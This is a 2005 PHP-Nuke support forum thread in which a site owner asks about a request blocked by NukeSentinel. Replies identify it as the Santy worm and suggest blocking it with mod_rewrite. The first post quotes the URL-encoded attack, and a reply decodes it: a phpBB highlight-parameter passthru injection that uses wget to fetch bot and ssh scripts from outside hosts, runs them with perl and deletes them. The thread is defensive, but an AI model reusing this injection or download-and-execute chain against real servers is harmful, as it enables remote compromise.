Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
Author Message
FatGiant
New Member
New Member



Joined: Jan 09, 2005
Posts: 13

PostPosted: Sun Jan 09, 2005 8:08 am Reply with quote

For several days, Sentinel has been blocking this script in one of my sites.

I'm pleased for it, but worried that at any moment they can find how to break this protection and get whatever they are trying to get.

This is what Sentinel reports to me, I ask your help in deciphering what it is and what they want, and, if possible, what can I do to keep protection.

Quote:
Blocked IP: 216.12.200.109
User ID: AnĂ³nimo (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.65
Query String: emergencias.portaisvivos.net/modules.php?name=Forums&rush=%65%
63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;
mkdir%20.temp22;cd%20.temp22;wget%20 [ Only registered users can see links on this board! Get registered or login! ] [ Only registered users can see links on this board! Get registered or login! ]
perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F
%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72
%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52
%53%5B%72%75%73%68%5D%29.%2527\';
Forwarded For: none
Client IP: none
Remote Address: 216.12.200.109
Remote Port: 55016
Request Method: GET


There was at the moment 100 of this attempts. What can I possibly do ?

The website is : http://emergencias.portaisvivos.net using Nuke 7 PT.

Thankyou for your time...

p.s.: In the quote I had to break the string in several lines, but is the report they are conected...
 
View user's profile Send private message
Raven
Site Admin/Owner



Joined: Aug 27, 2002
Posts: 17088

PostPosted: Sun Jan 09, 2005 9:18 am Reply with quote

It's the Santy worm. See [ Only registered users can see links on this board! Get registered or login! ] for a more thorough protection scheme.
 
View user's profile Send private message
sixonetonoffun
Spouse Contemplates Divorce



Joined: Jan 02, 2003
Posts: 2496

PostPosted: Sun Jan 09, 2005 9:20 am Reply with quote

Translates like this:
Code:


/modules.php?name=Forums&rush=e%
63ho _START_; cd /tmp;
mkdir .temp22;cd .temp22;wget
http://www.quasi-sane.com/pics/bot.htm;wget
http://weblicious.com/.notes/ssh2.htm;perl ssh2.htm;rm ssh.htm;
perl bot.htm;rm bot.htm; echo _
END_&highlight=%27.passthr
u($HTTP_GET_VAR
S[rush]).%27\';


To reduce the reports you can block it using mod rewrite which is well covered in the santy threads.

_________________
[b][size=5]openSUSE 11.4-x86 | Linux 2.6.37.1-1.2desktop i686 | KDE: 4.6.41>=4.7 | XFCE 4.8 | AMD Athlon(tm) XP 3000+ | MSI K7N2 Delta-L | 3GB Black Diamond DDR
| GeForce 6200@433Mhz 512MB | Xorg 1.9.3 | NVIDIA 270.30[/size:2b8 
View user's profile Send private message
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©